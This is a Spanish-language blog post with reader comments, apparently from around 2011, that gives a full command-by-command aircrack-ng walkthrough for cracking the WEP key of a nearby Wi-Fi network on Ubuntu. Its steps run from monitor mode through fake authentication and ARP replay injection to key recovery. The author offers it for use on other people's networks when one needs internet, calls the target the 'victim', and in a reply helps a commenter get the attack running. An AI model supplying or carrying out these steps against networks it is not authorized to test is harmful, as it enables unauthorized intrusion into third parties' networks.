Encontrar claves de WiFi o Wi-Fi con cifrado WEP en Ubuntu 10.04

Actualización (14 febrero 2011):

Realmente el proceso lo hice en xubuntu 10.04, asumí que funcionaba igual por ser mism@ sistema operativo distribución ubuntu, así que si no se quieren complicar por el siguiente error, utilicen una live CD o USB de xubuntu para hacer el proceso.

— El error es Channel Fixed : -1 , es decir no trabaja en el canal que le indicamos y es por culpa de algunos procesos de gnome, ejemplo cuando sale algo así:

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
1000    NetworkManager
1001    avahi-daemon
1004    avahi-daemon
1136    wpa_supplicant

++++ Pronto les diré como solucionar esto ++++

Saludos,

A veces es muy útil cuando estamos en algún lugar y nos urge conectarnos a la red de redes y no tenemos opciones cercanas (cafe’s internet, o se nos quedó el modem, etc) , entonces hacemos uso de esto sin abusar.

El proceso es el siguiente:

1. Necesitamos instalar el paquete aircrack-ng para hacer todo el procedimiento, abrir una consola y ejecutar esto:

sudo apt-get install aircrack-ng

Si no tienes internet, descarga los paquetes y los instalas en este orden:

iw_0.9.14-1_i386.deb

aircrack-ng_1.0-1_i386.deb

Para no estar escribiendo sudo en los comandos que siguen, voy a asumir que tienen la consola en modo super usuario es decir, #

2. Luego, debemos saber como se llama el identificador de nuestra red inalámbrica

# iwconfig

En mi caso se llama wlan0

3. Ahora vamos a ver cual es nuestra MAC:

# ifconfig

Entonces anotamos la secuencia que dice direcciónHW que tiene como estructura 1a:2b:3c:4d:5e:f6 (esto es un ejemplo)  lógicamente la de nuestra wlan0 en mi caso.

4. Empezamos el proceso, con el siguiente comando airmon-ng start (nombre de nuestro identificador):

# airmon-ng start wlan0

Esto va a hacer que nuestro adaptador entre en modo monitor y creará un identificador mon0

5. Ahora buscamos las redes que están a nuestro alcance:

# airodump-ng mon0

Ejemplo la red Bavare de esta imagen, de las cuales los datos importantes a anotar son: BSSID, canal (CH), ESSID y que sea WEP el tipo de cifrado (CIPHER) y algo muy importante es que hayan estaciones conectadas a la red eso facilita todo.. ejemplo miren que hay 3 clientes asociados a la red Bavare, tomen nota de la MAC (STATION) de alguno de ellos también, ejemplo 00:17:C4:85:2B:EB

Cuando obtengan algo parecido y anoten esos datos, paren este proceso con Ctrl + C

6. Sigue lo siguiente, airodump-ng -c (canal o CH) -w (nombre del archivo cualquiera para captura) mon0

# airodump-ng -c 1 -w datos mon0

Con esto escucharemos esa red y empezaremos a capturar paquetes en el archivo “datos

DEJAR ESTE PROCESO CORRIENDO EN ESA CONSOLA

7. Ahora abrimos otra consola y hacemos, aireplay-ng -1 6000 -q 10 -o 1 -e (ESSID de la victima) -a (MAC de nuestra victima o BSSID) -h (nuestra MAC) mon0

# aireplay-ng -1 6000 -q 10 -o 1 -e Bavare -a 00:02:CF:BB:C3:93 -h 1a:2b:3c:4d:5e:f6 mon0

DEJAR ESTE PROCESO CORRIENDO EN ESA CONSOLA

Les debe salir algo parecido a esto:

23:49:55  Waiting for beacon frame (BSSID: -- aquí va la mac que salga --) on channel 1

23:49:55  Sending Authentication Request (Open System) [ACK]
23:49:55  Authentication successful
23:49:55  Sending Association Request [ACK]
23:49:55  Association successful :-) (AID: 1)

23:50:05  Sending keep-alive packet [ACK]
23:50:15  Sending keep-alive packet [ACK]

8.  Abrimos otra consola con, aireplay-ng -3 -b (MAC de la victima o BSSID) -h (Nuestra MAC) mon0

# aireplay-ng -3 -b 00:02:CF:BB:C3:93 -h 1a:2b:3c:4d:5e:f6 mon0

DEJAR ESTE PROCESO CORRIENDO EN ESA CONSOLA

Les debe salir algo parecido a esto:

23:51:40  Waiting for beacon frame (BSSID: -- aquí va la mac que salga --) on channel 1
Saving ARP requests in replay_arp-0213-235140.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
957423 packets (got 235119 ARP requests and 283871 ACKs), sent 296016 packets...(500 pps)

Toca esperar a que la red capture entre 30.000 y 150.000 paquetes, eso lo ven en la imagen de arriba que dice #Data de la red Bavare

9.  Abrimos otra consola para descifrar la clave, este es el paso final.. les recomiendo esperar a los 150.000 paquetes para ser más efectivos,

# aircrack-ng *.cap

Si hay más de una red en el canal que estamos trabajando es normal que les pregunte que elijan la red, el número de la lista que les ofrece, lo digitan o presionan (y)

Eso nos debe dar un resultado de KEY FOUND como la siguiente imagen

10.  Ahora solo toca parar el estado del adaptador como monitor.

# airmon-ng stop mon0

# airmon-ng stop wlan0

11.  Desactivan y Activan la red inalámbrica en el ícono de red de ubuntu (Click derecho -> Activar red) e intentan conectarse a la red Bavare con la clave encontrada y cuando se conecte probamos que tenga internet.. a disfrutar!!

Esto lo vi y con video en : http://www.mijail.com.ve/2010/07/clave-wi-fi/

Anuncios

10 Replies to “Encontrar claves de WiFi o Wi-Fi con cifrado WEP en Ubuntu 10.04”

  1. Hola disculpa me sale esto: socket(PF_PACKET) failed: Operation not permitted
    This program requires root privileges.
    Despues de poner # aireplay-ng -1 6000 -q 10 -o 1 -e Bavare -a 00:02:CF:BB:C3:93 -h 1a:2b:3c:4d:5e:f6 mon0

    1. Hola RUdy ALex,

      Gracias por escribir, lo que pasa es que estas ejecutando el comando sin privilegios de usuario administrador.
      ese “#” indica que lo debes hacer con el usuario root, pero no debes escribir ese simbolo.

      El comando empiezalo con sudo, para que te pida la clave de tu usuario normal y ya con eso el lo hace como usuario root. ejemplo:
      sudo aireplay-ng -1 6000 -q 10 -o 1 -e Bavare -a 00:02:CF:BB:C3:93 -h 1a:2b:3c:4d:5e:f6 mon0

      los demás comando también llevan sudo.

  2. hola estaba viendo tu manual y me sale el error que pones arriba,no puedo cambiar de canal,sale este mensaje:
    mon0 is on channel -1 but the ap uses channel 6
    y ahi se termina todo,por casualidad sabes que hay que hacer? estoy haciendo algo mal?
    estoy usando ubuntu 10.10 x64 con gnome.
    gracias y saludos.

    1. Saludos claudio,

      Gracias por escribir, por lo pronto te recomiendo que lo hagas con la distribución xubuntu, porque no he mirado aún como solucionar este problema. El proceso es el mismo.

  3. No siempre teniendo la contraseña a disfrutar, porque pueda ser que el punto de acceso este en estatico, y pues a averiguar el segmento de red y por supuesto el gateway, puede ser que atras de esa encriptacion este un servidor dedicado, como mikrotik, o un proxy, tantas cosas que peuden poner como seguridad extra, una buena seguridad es una encriptacion wep y todo estatico y cambiar el segmento de red por defecto que viene en el router o acces point :), todo estatico a ver pues si pueden encontrar con wireshark el gateway 🙂

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s